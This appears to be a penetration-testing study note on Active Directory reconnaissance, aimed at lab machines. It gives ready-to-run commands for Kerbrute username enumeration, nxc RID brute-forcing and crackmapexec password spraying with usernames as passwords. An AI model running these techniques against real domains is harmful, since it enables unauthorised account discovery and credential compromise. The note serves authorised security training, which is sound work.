// notes/ Active Directory
🏛️

Initial Attack Strategy Kerbrute

Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.

#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_kerbrute

Kerbrute

Overview

Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.

After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.

{% embed url="https://github.com/ropnop/kerbrute" %}

Kerbrute Attack

CAN ALSO BE DONE BRUTEFORCING RID's USING NXC

code
01nxc smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

Enumerate for users

bash
$kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL

{% hint style="info" %} /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt {% endhint %}

<figure><img src="/files/xZLjWppNB8nrL0tmA05c" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>

Password spray using --no-brute to avoid account lockout

bash
$crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb
<figure><img src="/files/6tIAAMJ7S4S6oar3gZZ5" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>